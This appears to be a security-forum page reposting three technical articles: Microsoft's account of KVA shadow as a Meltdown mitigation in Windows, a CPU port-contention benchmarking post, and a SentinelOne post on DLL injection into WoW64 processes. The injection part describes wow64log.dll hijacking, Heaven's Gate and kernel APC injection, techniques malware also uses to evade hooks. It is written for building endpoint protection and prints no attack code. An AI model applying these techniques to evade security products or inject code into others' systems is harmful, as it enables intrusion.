protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. Memory management considerations for KVA shadow Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity. In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as any updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory page if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge-cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel, because processors susceptible to rogue data cache load cannot observe any cached virtual address translations for any privileged kernel pages that could contain sensitive memory contents while in user mode, for KVA shadow protections to be effective, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch. Booting is just the beginning of a journey At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow. However, there’s much more that’s involved beyond just trap handling and memory management: For example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the basics of the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load. Performance optimizations One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory. Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer, (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done so, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost. PCID acceleration The first optimization, the usage of PCID (process-context identifier) acceleration is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, and which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached the processor’s TB; then, on address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires that the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces. This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). User/global acceleration Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations including global translations is provided by the processor, for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global. Privileged process acceleration The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications. Optimizations are ongoing The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort. Driver and application compatibility A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure. Conclusion Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities. Ken Johnson, Microsoft Security Response Center (MSRC) Sursa: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
-
Understanding CPU port contention. 21 Mar 2018 I continue writing about performance of the processors and today I want to show some examples of issues that can arise in the CPU backend. In particular today’s topic will be CPU ports contention. Modern processors have multiple execution units. For example, in SandyBridge family there are 6 execution ports: Ports 0,1,5 are for arithmetic and logic operations (ALU). Ports 2,3 are for memory reads. Port 4 is for memory write. Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, will present easy to understand pipeline diagramms and even try IACA. It will be very interesting, so keep on reading! Disclaimer: I don’t want to describe some nuances of IvyBridge achitecture, but rather to show how port contention might look in practice. Utilizing full capacity of the load instructions In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at first example where I will read one cache line (64 in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make reads within one cache-line in order to eliminate cache effects. I will repeat this 1000 times: max load capacity ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] dec edi jnz .loop I think there will be no issue with loading values in the same eax register, because CPU will use register renaming for solving this write-after-write dependency. Performance counters that I use UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X. UOPS_EXECUTED.STALL_CYCLES - Counts number of cycles no uops were dispatched to be executed on this thread. UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops was executed per-thread. Full list of performance counters for IvyBridge can be found here. Results I did my experiments on IvyBridge CPU using uarch-bench tool. Benchmark Cycles UOPS.PORT2 UOPS.PORT3 UOPS.PORT5 max load capacity 8.02 8.00 8.00 1.00 We can see that our 16 loads were scheduled equally between PORT2 and PORT3, each port takes 8 uops. PORT5 takes MacroFused uop appeared from dec and jnz instruction. The same picture can be observed if use IACA tool (good explanation how to use IACA): Architecture - IVB Throughput Analysis Report -------------------------- Block Throughput: 8.00 Cycles Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA Port Binding In Cycles Per Iteration: ------------------------------------------------------------------------- | Port | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | ------------------------------------------------------------------------- | Cycles | 0.0 0.0 | 0.0 | 8.0 8.0 | 8.0 8.0 | 0.0 | 1.0 | ------------------------------------------------------------------------- N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0) D - Data fetch pipe (on ports 2 and 3), CP - on a critical path F - Macro Fusion with the previous instruction occurred | Num Of | Ports pressure in cycles | | | Uops | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | | --------------------------------------------------------------------- | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x4] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x8] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0xc] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x10] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x14] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x18] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x1c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x20] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x24] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x28] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x2c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x30] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x34] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x38] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x3c] | 1 | | | | | | 1.0 | | dec rdi | 0F | | | | | | | | jnz 0xffffffffffffffbe Total Num Of Uops: 17 Why we have 8 cycles per iteration? On modern x86 processors load instruction takes at least 4 cycles to execute even the data is in the L1-cache. Although according to Agner’s instruction_tables.pdf it has 2 cycles latency. Even if we would have latency of 2 cycles we would have (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles. According to this calculations we should receive 16 cycles per iteration. But we are running at 8 cycles per iteration. Why this happens? Well, like most of execution units, load units are also pipelined, meaning that we can start second load while first load is in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on. This is simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages: F(fetch) D(decode) I(issue) E(execute) or M(memory operation) W(write back) It is far from real execution diagram of my CPU, however, I preserved some important constraints for IvyBridge architecture (IVB): IVB front-end fetches 16B block of instructions in a 16B aligned window in 1 cycle. IVB has 4 decoders, each of them can decode instructions that consist at least of a single uop. IVB has 2 pipelined units for doing load operations. Just to simplify the diagrams I assume load operation takes 2 cycles. M1 and M2 stage reflect that in the diagram. It just need to be said that I omitted one important constraint. Instructions always retire in program order, in my later diagrams it’s broken (I simply forgot about it when I was making those diagrams). Drawing such kind of diagrams usually helps me to understand what is going on inside the processor and finding different sorts of hazards. Some explanations for this pipeline diagram In first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B aligned window as first 4 loads. In second cycle we were able to decode all 4 fetched instructions, because they all are single-uop instructions. In third cycle we were able to issue only first 2 loads. One of such load goes to PORT2, the second goes to PORT3. Notice, that LOAD3 and LOAD4 are stalled (typically waiting in Reservation Station). Only in cycle #4 we were able to issue LOAD3 and LOAD4, because we know M1 stages will be free to use in next cycle. Continuing this diagram further we could see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration. I made additional experiment to prove this theory. I collected some more performance counters: Benchmark Cycles CYCLES_GE_3_UOP_EXEC CYCLES_GE_2_UOP_EXEC CYCLES_GE_1_UOP_EXEC max load capacity 8.02 1.00 8.00 8.00 Results above show that in each of 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (last 2 loads + dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling it in parrallel with 2 loads. What is even more interesting is that if we do simulation with assumption that load instruction takes 4 cycles latency, all the conclusions in this example will be still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions each cycle. And that would mean that our 16 loads (inside each iteration) will retire in 8 cycles. Utilizing other available ports in parallel In the example that I presented, I’m only utilizing PORT2 and PORT3. And partailly PORT 5. What does that mean? Well, it means that we can schedule instructions on another ports in parrallel with loads just for free. Let’s try to write such an example. I added after each pair of loads one bswap instruction. This instruction reverses the byte order of a register. It is very helpful for doing big-endian to little-endian conversion and vice-versa. There is nothing special about this instruction, I just chose it because it suites best to my experiments. According to Agner’s instruction_tables.pdf bswap instruction on a 32-bit register is executed on PORT1 and has 1 cycle latency. max load capacity + 1 bswap ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx dec edi jnz .loop Here are the results for such experiment: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 max load capacity + 1 bswap 8.03 8.00 8.01 8.01 1.00 First observation is that we get 8 more bswap instructions just for free (we are running still at 8 cycles per iteration), because they do not contend with load instructions. Let’s look at the pipeline diagram for this case: We can see that all bswap instructions nicely fit into the pipeline causing no hazards. Overutilizing ports Modern compilers will try to schedule instructions for particular target architecture to fully utilize all execution ports. But what happens when we try to schedule too much instruction for some execution port? Let’s see. I added one more bswap instruction after each pair of loads: port 1 throughput bottleneck ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx bswap ecx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx bswap ecx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx bswap ecx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx bswap ecx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx bswap ecx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx bswap ecx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx bswap ecx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx bswap ecx dec edi jnz .loop When I measured result using uarch-bench tool here is what I received: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 port 1 throughput bottleneck 16.00 16.00 8.01 8.01 1.00 To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again: Now it’s clear to see that we have 16 bswap instructions and only one port that can handle this kind of instructions. So, we can’t go faster than 16 cycles in this case, because IVB processor executes them sequentially. Different architectures might have more ports to handle bswap instructions which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know limitations of your hardware! Additional resources More detailed information about execution ports of your processor can be found in Agner’s microarchitecture.pdf and for Intel processors in Intel’s optimization manual. All the assembly examples that I showed in this article are available on my github. UPD 23.03.2018 Several people mentioned that load instructions can’t have 2 cycles latency on modern Intel Architectures. Agner’s tables seems to be not accurate there. I will not redo the diagrams as it will be difficult to understand them, and they will shift the focus from the actual thing I wanted to explain. Again, I didn’t want to reconstruct how the pipeline diagram will look in reality, but rather to explain the notion of port contention. However, I totally accept the comment and it should mentioned. But also if we assume that load instruction takes 4 cycles latency in those examples, all the conclusions in the post are still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in HackerNews comments. Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
-
DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32. Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll The main advantage of this method lies in its sheer simplicity – All it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method: First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc. Heaven’s Gate More control over the injection process can be achieved by simply issuing the call to LdrLoadDll()ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages: Gain the ability to execute arbitrary 32-bit code inside the target process. Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments. Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification: Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure: The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process so using LoadLibrary() and its variants is not possible. The path to the DLL we wish to load into the process. Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments: Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A ). Albeit promising, when attempting to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error. Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle. Appendixes Appendix A – complete source code for APC injection with adapter thunk Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
-
